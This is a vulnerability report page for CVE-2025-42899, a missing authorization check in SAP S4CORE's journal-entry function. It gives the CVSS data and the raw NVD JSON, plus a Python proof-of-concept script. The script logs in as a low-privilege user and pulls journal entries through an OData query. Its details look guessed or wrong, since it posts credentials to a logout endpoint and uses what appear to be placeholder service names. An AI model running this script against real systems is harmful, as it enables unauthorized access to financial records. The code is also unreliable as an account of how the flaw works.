Security Vulnerability Report
CVE-2025-42899 CVSS 4.3 MEDIUM

CVE-2025-42899

Published: 2025-11-11 01:15:39
Last Modified: 2026-04-15 00:35:42

Description

SAP S4CORE (Manage journal entries) does not perform necessary authorization checks for an authenticated user resulting in escalation of privileges. This has low impact on confidentiality of the application with no impact on integrity and availability of the application.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP S4CORE (Manage journal entries) - All versions prior to security patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-42899 PoC - SAP S4CORE Authorization Bypass
# Description: SAP S4CORE Manage Journal Entries authorization check bypass
# This PoC demonstrates how low-privilege users can access unauthorized journal entries

import requests
import sys


def exploit_sap_auth_bypass(target_url, username, password):
    """
    Exploit SAP S4CORE authorization bypass vulnerability
    """
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Authenticating as: {username}")

    # Step 1: Authenticate with low-privilege account
    session = requests.Session()
    auth_data = {
        'j_username': username,
        'j_password': password
    }
    # Note: Adjust authentication endpoint based on SAP version
    login_url = f"{target_url}/sap/public/icf_logout"
    response = session.post(login_url, data=auth_data, verify=False)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Access journal entries with manipulated parameters
    # Attempt to access journal entries belonging to other users
    journal_url = f"{target_url}/sap/opu/odata/sap/FBIP_JOURNAL_ENTRY_SRV/JournalEntrySet"
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json'
    }
    # Try accessing all journal entries without proper authorization
    params = {
        '$filter': "Ledger eq 'ALL'",
        '$top': '100'
    }
    print("[*] Attempting to access unauthorized journal entries...")
    response = session.get(journal_url, headers=headers, params=params)
    if response.status_code == 200:
        data = response.json()
        if 'd' in data and 'results' in data['d']:
            print(f"[+] Successfully accessed {len(data['d']['results'])} journal entries")
            print("[+] Authorization bypass confirmed - low privilege user accessed privileged data")
            return True
    print("[-] Access denied or unexpected response")
    return False


if __name__ == "__main__":
    # Script takes three arguments, so argv has four entries including the script name
    if len(sys.argv) < 4:
        print("Usage: python cve_2025_42899_poc.py <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_sap_auth_bypass(target, user, pwd)
```

References

- https://me.sap.com/notes/3530544
- https://url.sap/sapsecuritypatchday

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-42899",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T01:15:38.783",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP S4CORE (Manage journal entries) does not perform necessary authorization checks for an authenticated user resulting in escalation of privileges. This has low impact on confidentiality of the application with no impact on integrity and availability of the application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3530544",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}
```